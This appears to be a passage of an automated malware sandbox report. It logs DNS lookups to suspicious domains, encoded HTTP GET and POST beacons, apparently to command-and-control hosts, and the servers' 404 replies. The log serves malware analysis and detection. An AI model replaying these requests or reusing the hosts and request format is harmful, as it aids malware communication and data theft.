                Source: global trafficHTTP traffic detected: GET /bpf5/?IBQP=pXMEvi9dRTmSqe0Y/4GBXZDx+YOuS/91ab/OOhxfwBThN5bse0Jkmjq1VKEOxLsbrchn3SsLKrmnhDLmelrdYhtBAF1WpWB+lKbsf3p2+Ms5acdIbtU3K2Q=&Lr3=uHMLTHRPCpsdapr HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usHost: www.7fh27o.vipConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                Source: global trafficHTTP traffic detected: GET /7tio/?IBQP=cWPhyGnsppbegOPzdBDZ8kAQGuS94D1G+AoDqW+mjKcXo4pHCPC/PWAHmCcbh45dI7FSbj8dWK0Lqwzkb07fC7SLHWTv9NL+DwjYDKm9EtTm1O3Sw1W7F3k=&Lr3=uHMLTHRPCpsdapr HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usHost: www.redex.funConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                Source: global trafficHTTP traffic detected: GET /m462/?Lr3=uHMLTHRPCpsdapr&IBQP=+ctYCmnSkPlep9Adc1BBeyk16jbVmqK7c+CyNKpVFEvGl71cISvbhoUUnqNAW+fldTGCXi6FrrY6EQlGHI7/1BufmIEFBScb4VziJby0bO6di8KjpFsVcvc= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usHost: www.havan-oficial.onlineConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                Source: global trafficHTTP traffic detected: GET /baro/?IBQP=D7yMJrJ+Bz0juplqGbpVYA283ArNTbOObR02L6PPq/HBNKim//Ru1diaK3xlwJ9I24oBUaKRGGlFo6D1EDnpzzz5D4RzRliFajrOrAWZbQXn8yCyBaZzqS4=&Lr3=uHMLTHRPCpsdapr HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usHost: www.oriony.liveConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                Source: global trafficHTTP traffic detected: GET /nv0k/?Lr3=uHMLTHRPCpsdapr&IBQP=b9xh2wNitcKI3BLOmRjNajqJ0tdb3ZZVPMzZODjakpnC+heNAUn9ftCKfCQrWYHlPV0mdElsgMOd9Q6Pt9W1dBqGyTWsnEm56VmQ9Adh6JnhLBjPDA8XHds= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usHost: www.wcp95.topConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                Source: global trafficHTTP traffic detected: GET /a5kc/?IBQP=GSS8lqfirIo3qKe7Y+dCXWv0mdSKk5n/ixY/743hYinZaJ7BEmItwuPe7a8fXvxPgKT6vw3k6f8F4VRaa+UbvaitD0wR/tUqvXopoFkCCKedzBtE3j2pmTo=&Lr3=uHMLTHRPCpsdapr HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usHost: www.thesquare.worldConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                Source: global trafficHTTP traffic detected: GET /5lh9/?Lr3=uHMLTHRPCpsdapr&IBQP=PaxL/KCEHD9JblfI8738jkEyOBGmpH0n0YqV+FGo7SRz69ewzjAIy/AjxHMCTjWvQh2WDn5x5gTk9H7000rUU48po7SBA+lXfQsIcMqVCaJxO3wRg1gJgNU= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usHost: www.bocadolobopetra.netConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                Source: netbtugc.exe, 00000004.00000002.33211544402.000000000806B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: icies":[{"name":"OnlyExposePlayReady","type":"Playready"},{"name":"OnlyExposeWidevine","type":"Widevine"}],"version":1},"codec_override":{"applications":[{"applied_policy":"HideMfHevcCodec","domain":"tv.apple.com"},{"applied_policy":"HideMfHevcCodec","domain":"nintendo.com"}],"policies":[{"name":"HideMfHevcCodec","type":"MfHevcCodec"}],"version":1},"content_filter_on_off_switch":{"applications":[{"applied_policy":"ContentFilter","domain":"microsoft.com"}],"policies":[{"name":"ContentFilter"}],"version":1},"ecp_override":{"applications":[{"applied_policy":"PlainTextURLsOnly","domain":"hangouts.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"chat.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"slack.com"},{"applied_policy":"PlainTextURLsOnly","domain":"facebook.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wechat.com"},{"applied_policy":"PlainTextURLsOnly","domain":"weixin.com"},{"applied_policy":"PlainTextURLsOnly","domain":"qq.com"},{"applied_policy":"PlainTextURLsOnly","domain":"webex.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wordpress.com"},{"applied_policy":"PlainTextURLsOnly","domain":"twitter.com"},{"applied_policy":"PlainTextURLsOnly","domain":"discord.com"}],"policies":[{"name":"PlainTextURLsOnly","type":"ECPOnlyPlaintextURLs"}],"version":1},"idl_override":{"applications":[{"applied_policy":"ExposePrefixedEME","domain":"netflix.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.jp"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.uk"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.de"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.es"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.fr"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.in"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.it"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.ca"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com.br"},{"applied_policy":"ExposePrefixedEME","domain":"sling.com"},{"applied_policy":"ExposePrefixedEME","domain":"openidconnectweb.azurewebsites.net"}],"policies":[{"name":"ExposePrefixedEME","type":"PrefixedEme"}],"version":1},"media_foundation_override":{"applications":[{"applied_policy":"OptIn","domain":"youtube.com","path_exclude":["/shorts","/kids"],"subdomain_exclude":["tv.youtube.com","studio.youtube.com","vr.youtube.com"]}],"policies":[{"name":"OptIn","type":"MediaFoundationOptIn"},{"name":"OptOut","type":"MediaFoundationOptOut"}],"version":1},"web_notification_override":{"applications":[{"applied_policy":"prompt","domain":"www.reddit.com"},{"applied_policy":"prompt","domain":"www.telegraphindia.com"},{"applied_policy":"prompt","domain":"timesofindia.indiatimes.com"},{"applied_policy":"prompt","domain":"pushengage.com"},{"applied_policy":"prompt","domain":"www.timesnownews.com"},{"applied_policy":"prompt"
                Source: global trafficDNS traffic detected: DNS query: www.kikaraofficial.xyz
                Source: global trafficDNS traffic detected: DNS query: www.6686vi38.app
                Source: global trafficDNS traffic detected: DNS query: www.7fh27o.vip
                Source: global trafficDNS traffic detected: DNS query: www.redex.fun
                Source: global trafficDNS traffic detected: DNS query: www.havan-oficial.online
                Source: global trafficDNS traffic detected: DNS query: www.oriony.live
                Source: global trafficDNS traffic detected: DNS query: www.wcp95.top
                Source: global trafficDNS traffic detected: DNS query: www.thesquare.world
                Source: global trafficDNS traffic detected: DNS query: www.bocadolobopetra.net
                Source: global trafficDNS traffic detected: DNS query: www.rmzl-0.rest
                Source: global trafficDNS traffic detected: DNS query: www.imgiu9.vip
                Source: global trafficDNS traffic detected: DNS query: www.premium303max.rest
                Source: global trafficDNS traffic detected: DNS query: www.155n8etsy.autos
                Source: global trafficDNS traffic detected: DNS query: www.uppercrust.club
                Source: global trafficDNS traffic detected: DNS query: www.ergeneescortg.xyz
                Source: global trafficDNS traffic detected: DNS query: www.06753.photo
                Source: unknownHTTP traffic detected: POST /o25q/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-usHost: www.6686vi38.appOrigin: http://www.6686vi38.appCache-Control: no-cacheContent-Length: 201Content-Type: application/x-www-form-urlencodedConnection: closeReferer: http://www.6686vi38.app/o25q/User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)Data Raw: 49 42 51 50 3d 64 72 37 70 34 52 2b 61 4f 46 58 6d 6f 79 46 6c 75 47 6f 71 41 6a 48 4b 78 71 73 68 4e 4d 48 71 47 64 4f 73 4f 44 69 6c 67 32 59 53 32 35 4f 72 75 39 4d 2b 67 56 74 76 47 69 6c 32 31 4a 47 63 43 5a 31 44 70 44 4a 51 70 73 49 31 49 51 46 6c 59 74 58 63 51 76 6d 6f 38 5a 6b 30 56 79 32 37 31 72 42 70 79 58 6a 57 32 6f 4d 6c 32 56 69 4e 4e 75 62 39 5a 2b 49 75 77 6c 4c 73 34 2b 47 76 30 2f 53 71 30 45 4a 75 57 71 39 37 48 66 4f 70 79 58 2f 4f 58 57 4d 6c 79 75 4a 68 30 77 78 35 4c 4e 6e 66 79 59 61 38 35 75 55 43 36 58 41 66 52 57 67 38 4f 44 43 4b 58 57 71 34 47 2f 57 42 6b 77 3d 3d Data Ascii: IBQP=dr7p4R+aOFXmoyFluGoqAjHKxqshNMHqGdOsODilg2YS25Oru9M+gVtvGil21JGcCZ1DpDJQpsI1IQFlYtXcQvmo8Zk0Vy271rBpyXjW2oMl2ViNNub9Z+IuwlLs4+Gv0/Sq0EJuWq97HfOpyX/OXWMlyuJh0wx5LNnfyYa85uUC6XAfRWg8ODCKXWq4G/WBkw==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Mon, 11 Nov 2024 16:01:00 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-11-11T16:01:05.9195744Z
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 16:01:52 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closex-ray: p529:0.000Data Raw: 31 37 64 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 4f 4e 54 45 4e 54 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 54 49 54 4c 45 3e d0 a1 d0 b0 d0 b9 d1 82 20 77 77 77 2e 72 65 64 65 78 2e 66 75 6e 20 d0 bd d0 b5 20 d0 bd d0 b0 d1 81 d1 82 d1 80 d0 be d0 b5 d0 bd 20 d0 bd d0 b0 20 d1 81 d0 b5 d1 80 d0 b2 d0 b5 d1 80 d0 b5 3c 2f 54 49 54 4c 45 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 61 64 6d 2e 74 6f 6f 6c 73 2f 70 61 72 6b 69 6e 67 2d 70 61 67 65 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6c 61 6e 67 75 61 67 65 73 20 3d 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 65 6e 27 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 74 69 74 6c 65 27 3a 20 27 57 65 62 73 69 74 65 20 77 77 77 2e 72 65 64 65 78 2e 66 75 6e 20 6e 6f 74 20 63 6f 6e 66 69 67 75 72 65 64 20 6f 6e 20 73 65 72 76 65 72 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 68 31 27 3a 20 27 57 65 62 73 69 74 65 20 77 77 77 2e 72 65 64 65 78 2e 66 75 6e 20 6e 6f 74 20 63 6f 6e 66 69 67 75 72 65 64 20 6f 6e 20 73 65 72 76 65 72 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 2e 6d 65 73 73 61 67 65 31 27 3a 20 27 57 65 62 73 69 74 65 20 3c 62 3e 77 77 77 2e 72 65 64 65 78 2e 66 75 6e 3c 2f 62 3e 20 69 73 20 6e 6f 74 20 63 6f 6e 66 69 67 75 72 65 64 20 6f 6e 20 74 68 65 20 68 6f 73 74 69 6e 67 20 73 65 72 76 65 72 2e 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 2e 6d 65 73 73 61 67 65 32 27 3a 20 27 44 6f 6d 61 69 6e 20 61 64 64 72 65 73 73 20 72 65 63 6f 72 64 20 70 6f 69 6e 74 73 20 74 6f 20 6f 75 72 20 73 65 72 76 65 72 2c 20 62 75 74 20 74 68 69 73 20 73 69 74 65 20 69 73 20 6e 6f 74 20 73 65 72 76 65 64 2e 3c 62 72 3e 49 66 20 79 6f 75 20 68 61 76 65 20 72 65 63 65 6e 74 6c 79 20 61 64 64 65 64 20 61 20 73 69 74 65 20 74 6f 20 79 6f 75 72 20 63 6f 6e 74 72 6f 6c 20 70 61 6e 65 6c 20 2d 20 77 61 69 74 20 31 35 20 6d 69 6e 75 74 65 73 20 61 6e 64 20 79 6f 75 72 20 73 69 74 65 20 77 69 6c 6c 20 73 74 61 72 74 20 77 6f 72 6b 69 6e 67 2e 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 2e 68 65 6c 70 5f 62 75 74 74 6f 6e 27 3a 20 27 48 6f 77 20 63 61 6e 20 49 20 66 69 78 20 74 68 69 73 3f 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 16:02:11 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 16:02:14 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 16:02:17 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 16:02:19 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 16:02:25 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a747c1-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 16:02:28 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a747c1-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 16:02:31 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a747c1-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 16:02:34 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a747c1-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
